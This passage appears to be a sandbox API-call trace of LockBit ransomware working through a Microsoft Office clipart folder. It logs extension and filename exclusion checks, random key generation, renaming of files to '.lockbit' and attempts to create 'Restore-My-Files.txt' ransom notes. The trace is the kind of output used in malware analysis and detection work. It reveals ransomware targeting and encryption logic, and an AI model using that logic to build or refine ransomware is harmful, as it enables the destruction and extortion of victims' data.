(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.194] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xaec, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01146_.WMF", cAlternateFileName="")) returned 1 [0112.194] lstrcmpiW (lpString1=".", lpString2="DD01146_.WMF") returned -1 [0112.194] lstrcmpiW (lpString1="..", lpString2="DD01146_.WMF") returned -1 [0112.194] PathFindExtensionW (pszPath="DD01146_.WMF") returned=".WMF" [0112.194] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.194] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.195] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.195] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01146_.WMF") returned 1 [0112.196] lstrcmpiW (lpString1="ntldr", lpString2="DD01146_.WMF") returned 1 [0112.196] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01146_.WMF") returned 1 [0112.196] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01146_.WMF") returned -1 [0112.196] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01146_.WMF") returned -1 [0112.196] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01146_.WMF") returned 1 [0112.196] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01146_.WMF") returned 1 [0112.196] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.196] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF") returned=".WMF" [0112.196] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.196] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.196] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.197] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.197] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.lockbit") returned 72 [0112.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01146_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0112.198] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.198] malloc (_Size=0x40068) returned 0x3e70008 [0112.198] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2796) returned 1 [0112.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0112.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.200] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0112.200] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0112.213] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.213] malloc (_Size=0xa6) returned 0x77d7a8 [0112.213] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.216] free (_Block=0x77d7a8) [0112.216] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01146_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.216] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.216] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.216] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01151_.WMF", cAlternateFileName="")) returned 1 [0112.216] lstrcmpiW (lpString1=".", lpString2="DD01151_.WMF") returned -1 [0112.216] lstrcmpiW (lpString1="..", lpString2="DD01151_.WMF") returned -1 [0112.217] PathFindExtensionW (pszPath="DD01151_.WMF") returned=".WMF" [0112.217] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.217] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.218] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.218] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01151_.WMF") returned 1 [0112.218] lstrcmpiW (lpString1="ntldr", lpString2="DD01151_.WMF") returned 1 [0112.218] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01151_.WMF") returned 1 [0112.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01151_.WMF") returned -1 [0112.219] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01151_.WMF") returned -1 [0112.219] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01151_.WMF") returned 1 [0112.219] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01151_.WMF") returned 1 [0112.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF") returned=".WMF" [0112.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.219] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0112.219] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0112.220] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0112.220] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.lockbit") returned 72 [0112.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01151_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0112.221] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0112.221] malloc (_Size=0x40068) returned 0x3ef0008 [0112.221] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=2960) returned 1 [0112.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0112.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0112.222] ReadFile (in: hFile=0x81c, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.226] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0112.227] malloc (_Size=0xa6) returned 0x77d7a8 [0112.227] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0112.227] free (_Block=0x77d7a8) [0112.227] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01151_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0112.228] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0112.228] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0112.228] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d817b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb90, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD01152_.WMF", cAlternateFileName="")) returned 1 [0112.228] lstrcmpiW (lpString1=".", lpString2="DD01152_.WMF") returned -1 [0112.228] lstrcmpiW (lpString1="..", lpString2="DD01152_.WMF") returned -1 [0112.228] PathFindExtensionW (pszPath="DD01152_.WMF") returned=".WMF" [0112.228] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0112.228] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0112.229] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0112.229] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0112.230] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD01152_.WMF") returned 1 [0112.230] lstrcmpiW (lpString1="ntldr", lpString2="DD01152_.WMF") returned 1 [0112.230] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD01152_.WMF") returned 1 [0112.230] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD01152_.WMF") returned -1 [0112.230] lstrcmpiW (lpString1="autorun.inf", lpString2="DD01152_.WMF") returned -1 [0112.230] lstrcmpiW (lpString1="thumbs.db", lpString2="DD01152_.WMF") returned 1 [0112.230] lstrcmpiW (lpString1="iconcache.db", lpString2="DD01152_.WMF") returned 1 [0112.230] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0112.230] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01152_.WMF") returned=".WMF" [0112.231] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0112.231] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0112.231] lstrcmpiW (lpString1=".dbv", 